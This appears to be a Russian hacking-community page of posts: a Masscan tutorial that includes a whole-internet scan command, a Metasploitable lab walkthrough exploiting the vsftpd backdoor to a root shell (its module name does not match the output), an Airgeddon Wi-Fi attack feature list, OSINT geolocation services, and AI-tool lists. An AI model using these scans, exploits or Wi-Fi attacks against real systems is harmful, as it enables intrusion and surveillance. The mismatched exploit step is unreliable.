Сообщество - Life-Hack [Жизнь-Взлом]/Хакинг
Добавить пост

Life-Hack [Жизнь-Взлом]/Хакинг

124 поста 1 308 подписчиков

Популярные теги в сообществе:

5

Правильное использование Masscan на Kali Linux

Что такое Masscan

Этот самый быстрый сканер портов дает результат, аналогичный Nmap, но Masscan работает как Unicornscan, внутри Zenmap (асинхронное сканирование). Это быстрее из-за гибкости, допускающей произвольные диапазоны и диапазоны портов.

Masscan использует собственный стек TCP/IP. Все, кроме простого сканирования портов, может вызвать конфликт с локальным стеком TCP/IP.

Установка Masscan на Linux

Masscan установлен в полной версии Kali Linux. Мы можем проверить основные варианты использования, выполнив команду:

masscan

Если в системе не установлен Masscan, тогда установите зависимости:

sudo apt-get install clang git gcc make libpcap-dev

И применив следующую команду, установите Masscan с помощью:

sudo apt-get install masscan

Или клонировать репозиторий GitHub.

git clone https://github.com/robertdavidgraham/masscan

cd masscan

sudo make

Как пользоваться Masscan

Masscan используется для сканирования сети, если необходимо просканировать только один порт:

sudo masscan 172.217.167.46 -p443

Команда выше начнет сканировать один порт 443.

Также можно использовать инструмент для сканирования нескольких портов, разделенных запятой (,):

sudo masscan 172.217.167.46 -p443,80,4444

Использование Masscan. Сканирование портов masscan

Для сканирования диапазона портов:

sudo masscan 172.217.167.46 -p12-443

Приведенная выше команда будет сканировать порт с 12 по 443.

Для сканирования всех портов:

sudo masscan 172.217.167.46 -p0-65535

Использование Masscan на полную катушку

Я говорил, что Masscan — самый быстрый сканер, но после выполнения предыдущих команд я не почувствовал, что он работает быстрее.

Причина в том, что Масскан, по умолчанию, сканирует со скоростью 100 пакетов в секунду (медленно). Чтобы увеличить скорость, нужно использовать параметр --rate:

sudo masscan 172.217.167.46 -p0-65535 --rate 25000000

Выполнив эту команду, мы сможем достичь максимальной скорости (25 миллионов пакетов в секунду).

Но имейте в виду. Скорость сканирования зависит от ОС. Вы не сможете разогнать сканер до максимальной скорости на системах Mac, Windows или на виртуальной машине Linux. Максимальная скорость при использовании ОС отличных от Linux — 300 000 пакетов в секунду.

Также скорость сканирования зависит подключение к Интернету.

В небольших сетях или при скандировании одного IP вы не заметите большую разницу. Чтобы увидеть весь потенциал инструмента, необходимо сканировать большую сеть.

По словам автора Роберта Грэма, Masscan может просканировать весь Интернет за 6 минут. Если мы хотим сканировать весь Интернет на наличие определенного порта (например, 443):

sudo masscan 0.0.0.0/0 -p443 --rate 250000000 --exclude 255.255.255.255

Как пользоваться Masscan. Сканирование интернет

Вот как можно найти конкретный уязвимый порт во всей сети Интернет.

Другое использование Masscan на Kali Linux

Чтобы сохранить результат вывода в файл, используйте команду:

sudo masscan 172.217.167.46 -p0-65535 > example.txt

Можно сохранять результат не только в формате txt, но и в форматах XML ( -oX), Grepable ( -oG) и JSON ( -oJ). Из-за совместимости с другими инструментами, я предпочитаю формат Grepable.

Если добавить параметр ‐top-ports 100, он будет сканировать 100 самых распространенных портов, обнаруженных в соответствии с Nmap:

sudo masscan 172.217.167.46 --top-ports 100 --rate 100000

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Показать полностью
10

Metasploitable: Пример атаки

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable

Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер

Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap

Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он -  192.168.1.131.

#Начало сканирования

Пишем в kali linux следующую компанду:

💣sudo nmap -sV -Pn --script vulners 192.168.1.131

Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.

Флаг Pn означает, что мы не отправим  ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости

Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole

Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

Exploit

И видим следующее:

192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)

* 192.168.1.131:21 - USER: 331 Please specify the password.

+ 192.168.1.131:21 - Backdoor service has been spawned, handling...

+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)

* Found shell.

* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Показать полностью
432

Airgeddon - многофункциональный инструмент для взлома Wi-Fi

Возможности Airgeddon:

▪Быстрое переключение между режимами работы адаптера.

▪DoS через беспроводные сети разными методами (mdk3, mdk4, aireplay-ng).

▪Полная поддержка диапазонов 2,4 ГГц и 5 ГГц.

▪Оптимизация захваченных файлов рукопожатий (Handshake).

▪Автономная расшифровка паролей в захваченных файлах WPA/WPA2 (Handshake и PMKID), с использованием словаря, брута и атак на основе правил, с помощью инструментов aircrack, crunch и hashcat.

Атаки Evil Twin (поддельная точка доступа)

▪Только режим Rogue/Fake AP для прослушивания с использованием внешнего анализатора (Hostapd + DHCP + DoS).

▪Простой встроенный сниффинг (Hostapd + DHCP + DoS + Ettercap).

▪Встроенный сниффинг, sslstrip2 (Hostapd + DHCP + DoS + Bettercap).

▪Интегрированный сниффинг, sslstrip2 и BeEF Browser Exploitation Framework (Hostapd + DHCP + DoS + Bettercap + BeEF).

▪Дополнительная подмена MAC-адреса для всех атак Evil Twin.

WPS-функции

▪WPS-сканирование.

▪Пользовательская ассоциация PIN-кода.

▪Атаки Pixie Dust.

▪Атаки методом перебора PIN-кода.

▪Атака с нулевым PIN-кодом (reaver).

▪Атака на известные PIN-коды WPS, основанная на онлайн-базе данных PIN-кодов.

▪Интеграция наиболее распространенных алгоритмов генерации PIN-кода (ComputePIN, EasyBox, Arcadyan и др.).

▪Генерация ПИН-кода в автономном режиме и возможность поиска цели в результатах ПИН-кода в базе данных.

▪Настраиваемые тайм-ауты для всех атак.

Атаки на корпоративные сети

▪Поддельная точка доступа, использующая «плавный» и «зашумленный» режимы, перехватывающая корпоративные хеши и простые пароли.

▪Создание сертификатов.

▪Атака WEP All-in-One (сочетание различных техник: Chop-Chop, Caffe Latte, ARP Replay, Hirte, Fragmentation, Fake Association и т. д.).

▪Совместимость со многими дистрибутивами Linux (см. раздел «Требования»).

▪Динамическое определение разрешения экрана и автоматический размер окон для оптимального просмотра.

▪Контролируемый выход. Очистка задач и временных файлов. Восстановление nftables/iptables после атаки, требующей внесения в них изменений. Возможность сохранить режим монитора при желании при выходе.

▪Многоязычная поддержка и функция автоматического определения языка ОС (см. раздел «Поддерживаемые языки»).

Подсказки меню, для удобства использования.

▪Автоматическое обновление. Скрипт проверяет наличие более новой версии, если это возможно.

▪Образ Docker для простого и быстрого развертывания контейнера. Можно использовать уже собранный образ на Docker Hub или собрать свой собственный.

▪Автоматическое определение HTTP-прокси для обновлений.

Поддерживается графическая система Wayland (не только система X Window).

▪Поддержка Tmux.

▪Полная совместимость с iptables и nftables с автоопределением и возможностью форсировать iptables путем установки опции.

▪Доступная система плагинов, позволяющая сообществу создавать свой собственный контент простым и гибким способом, используя созданную систему перехвата функций. Подробнее в разделе «Система плагинов».

Установка Airgeddon на Kali Linux

Airgeddon уже установлен в последних версиях Kali Linux. Если вы используете облегченную версию, то вот как его установить:

sudo apt-get install airgeddon

Приведенная выше команда запросит пароль root и права доступа к дисковому пространству. После этого будет установлен Airgeddon и некоторые зависимости.

Airgeddon также требует некоторых дополнительных инструментов. Для их установки выполните команду:

sudo apt install bettercap isc-dhcp-server hostapd hostapd-wpe udhcpd mdk4 hcxdumptool lighttpd hcxtools -y

Теперь, при наличии адаптера поддерживающего режим монитора и внедрение пакетов, можно начать использовать Airgeddon на Kali Linux.

Для взлома пароля WiFi можно использовать различные способы. Можно задействовать Airgeddon —> Offline WPA/WPA2 decrypt menu —> Personal > (aircrack + crunch) Bruteforce attack against Handshake/PMKID capture file или использовать aircrack-ng или онлайн-инструменты взлома хеша.

Информация предоставлена только в ознакомительных целях!

Мы в телеграме!

Показать полностью
22

Топ 5 сервисов для определения геолокации по фото

Сегодня мы решили немного рассказать вам о полезных OSINT-инструментах, которые тоже могут быть использованы в хакерских атаках, в которых есть место социальной инженерии.

Многие люди, как это ни странно в 2023 году, по-прежнему продолжают «чекиниться» и оставлять фотографии в социальных сетях с геолокацией, что, на наш взгляд, очень опрометчиво.

Вот 5 сервисов, которые определяют гео по фото в социальных сетях.

1. Huntintel —  сервис позволяет определить гео у постов в разных социальных сетях.

2. InstaHunt — бесплатный инструмент для Instagram.

3. BirdHunt — бесплатный инструмент для Twitter.

4. MetaData — сервис, который позволяет анализировать метаданные файлов, в том числе фото и картинок.

5. https://github.com/conflict-investigations/media-search-engi...  — сервис для поиска постов в социальных сетях по геолокации

Мы в телеграме, подписывайся!

478

Топ-5 бесплатных российских нейросетей

1) «Шедеврум» от Яндекса - нейросеть с приятным интерфейсом генерирует изображения по запросу, пользователь может уточнить детали и задать стиль рисовки. Доступна для скачивания в Google Play и AppStore.

Ссылка: https://play.google.com/store/apps/details?id=com.yandex.she...

2)  «Kandinsky 2.1» от Сбера  - нейронка может миксовать ваши картинки, добавлять к ним детали и преобразовывать их. Можно задать стиль рисовки. Доступна на сайте, в голосовом помощнике "Салют" от Сбера, а также в телеграм-боте.

Ссылка: https://fusionbrain.ai/?ysclid=lg441pgtt5432813559

3) "SistemmaGPT" - отечественный аналог ChatGPT 3.5. Нейросеть доступна только  для бизнес-сегмента, однако в июне намечается релиз для простых пользователей.

Ссылка: https://sistemma.ru/login

4) «Балабоба» - нейросеть от Яндекса, которая может написать вам текст по ключевым словам с опорой на материалы из Интернета.

Ссылка: https://yandex.ru/lab/yalm

5) "GigaChat" - мультимодальная нейросеть от Сбера.  Умеет отвечать на вопросы, вести диалог, написать код, нарисовать картинку по запросу. И всё на русском языке. Сейчас закрытое бета-тестирование, ожидается релиз.

Ссылка : https://developers.sber.ru/portal/products/gigachat#be-the-f...

Мы в телеграме, подписывайся!

712

Топ-5 нейронок для дизайнера!

1) Bigjpg

Если нужно улучшить качество изображения и изменить его размер без ограничений, этот инструмент то, что надо.

Ссылка: https://bigjpg.com/

2) Runway

Невероятный AI-монтаж для видео. Удаление фона, возможность использовать моушн-трекер и работать совместно с ИИ.

Ссылка: https://runwayml.com/

3) Tome

Создавайте презентации -  загрузите любой контент, добавьте описание и через несколько секунд получите потрясающую презентацию благодаря DALL·E 2.

Ссылка: https://tome.app/

4) Beautiful AI

Ваша презентация будет просто огонь -  удивите зрителей, впечатлите инвесторов.

Ссылка: https://www.beautiful.ai/

5) Rembrand

Сервис может создать виртуальную модель товара для рекламы и добавить его в видео даже после завершения съёмок.

Ссылка: https://www.rembrand.com/

Мы в телеграме!

1940

Найдены три промта, которые заставят ChatGPT выдавать идеальный ответ на даже самый сложный запрос

1. Универсальная текстовая подсказка, которая заставит ИИ разбить любой ответ на пошаговую инструкцию для более точного поиска ошибок:

«Let's work this out in a step by step way to be sure we have the right answer.» ;

2. Чтобы не проверять точность ответа в Google, заставьте ChatGPT самостоятельно проверить его предыдущий ответ на ошибки и слабые аргументы:

«You are a researcher tasked with investigating the [предыдущий ответ] response options provided. List the flaws and faulty logic of each answer option. Let's work this out in a step by step way to be sure we have all the errors:»;

3. А чтобы ИИ сам скомпоновал все действия в один ответ, используйте:

«You are a resolver tasked with 1) finding which of the [предыдущий ответ] answer options the researcher thought was best 2) improving that answer, and 3) Printing the improved answer in full. Let's work this out in a step by step way to be sure we have the right answer:»;

Для удобства можете в конце каждого сообщения просить ChatGPT отвечать на русском, но учтите, что результаты на английском будут точнее.

Мы в телеграмме!

1547

Куча нейронок для всех задач

Сохраняйте эту эпичную шпаргалку себе.

Куча нейронок для всех задач IT, Нейронные сети, Искусственный интеллект, Музыка, Картинки, Резюме, Звук, Код, Программирование, Программист
Показать полностью 1
Отличная работа, все прочитано!